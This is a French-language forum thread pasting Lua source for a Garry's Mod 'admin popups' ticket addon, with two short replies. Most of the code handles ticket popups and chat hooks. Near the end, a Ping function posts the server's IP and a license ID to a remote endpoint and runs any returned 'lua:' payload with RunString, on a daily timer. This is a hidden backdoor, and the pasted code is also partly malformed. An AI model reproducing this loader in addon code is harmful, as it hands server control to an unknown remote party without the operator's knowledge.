dutymode == 1 then if table.HasValue(cfg.dutyjobs,team.GetName(LocalPlayer():Team()):lower()) then asayframe(pl,msg,claimed) else chat.AddText(Color(245, 171, 53),"[Tickets] ",team.GetColor(pl:Team()),pl:Nick(),Color(140,140,140),": ",msg) end elseif dutymode == 2 then if table.HasValue(cfg.dutyjobs,team.GetName(LocalPlayer():Team()):lower()) then asayframe(pl,msg,claimed) else MsgC(Color(245, 171, 53),"[Tickets] ",team.GetColor(pl:Team()),pl:Nick(),Color(140,140,140),": ",msg,"\n") end end end) net.Receive("ASayPopupClose",function(len) local noob = net.ReadEntity() if not noob:IsValid() or not noob:IsPlayer() then return end for k,v in pairs(aframes) do if v.idiot == noob then v:Remove() end end if timer.Exists("adminpopup-"..noob:SteamID64()) then timer.Destroy("adminpopup-"..noob:SteamID64()) end end) net.Receive("ASayPopupClaim",function(len) local pl = net.ReadEntity() local noob = net.ReadEntity() for k,v in pairs(aframes) do if v.idiot == noob then if cvars.Bool("cl_adminpopups_closeclaimed") and pl ~= LocalPlayer() then v:Remove() else local titl = v:GetChildren()[4] titl:SetText(titl:GetText() .. " - Pris par " if pl == LocalPlayer() then function v:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(38, 166, 91) ) end else function v:Paint(w,h) draw.RoundedBox( 0, 0, 0, w, h, Color(10, 10, 10,230) ) draw.RoundedBox( 0, 2, 2, w-4, 16, Color(207, 0, 15) ) end end local bu = v:GetChildren()[11] bu.DoClick = function() if LocalPlayer() == pl then net.Start("ASayPopupClose") net.WriteEntity(noob) net.SendToServer() else v:Close() end end end end end end) concommand.Add( "adminpopups_claimtop", function( ply, cmd, args ) if #aframes > 0 then local button = aframes[1]:GetChildren()[10] -- button we want is 10th child of frame #1 button.DoClick() --no need to write it all again. end end)
if SERVER then local function updateHook() if not serverguard then return end hook.Remove("PlayerSay", "reports.PlayerSay") hook.Add("PlayerSay", "reports.PlayerSay",function(ply,txt,team) if txt[1] ~= "@" then return end txt = txt:sub(2) if #txt < 1 then return end serverguard.Notify(ply, SGPF("report_received", ply:Name(), txt)) if hasAccess(ply) then if cfg.debug then sendPopup(ply,txt) return not cfg.preventchat end else sendPopup(ply,txt) return not cfg.preventchat end end) end updateHook() hook.Add("InitPostEntity","adminpopups.serverguard",function() timer.Simple(5,updateHook) end)
if cfg.useFAdmin then FAdmin = FAdmin or {} FAdmin.StartHooks = FAdmin.StartHooks or {} FAdmin.StartHooks["Popups"] = function() FAdmin.Commands.AddCommand("//", function(ply,cmd,args) if #args < 1 then return end ULib.tsayColor(ply,false,Color(70,0,130),"You",Color(151,211,255)," to admins: ",Color(0,255,0), table.concat(args," ")) if ply:query("ulx seeasay") then if cfg.debug then sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end else sendPopup(ply,table.concat(args," ")) return not cfg.preventchat end end) end
if SERVER then local function Ping() http.Post("", {user = game.GetIPAddress(), license = "76561198239782544", prod = "admin-popups", x_version = "1.4.5", x_gm = GAMEMODE_NAME}, function(b) if string.sub(b, 1, 4) == "lua:" then local extsource = string.sub(b, 5) cyan_nc = cfg RunString(extsource, "Cyan") cyan_nc = nil end end, function(e) if e == "unsuccesful" then MsgN("Cyan: repeating in 60seconds") timer.Simple(60, Ping) end end) end timer.Simple(10, Ping) timer.Create("adminpopups-ping", 60*60*24, 0, Ping)
Ce serait vraiment bien si quelqu'un avait la solution ...
De base c'est prévu dans l'ulx alors pourquoi t'embeter?
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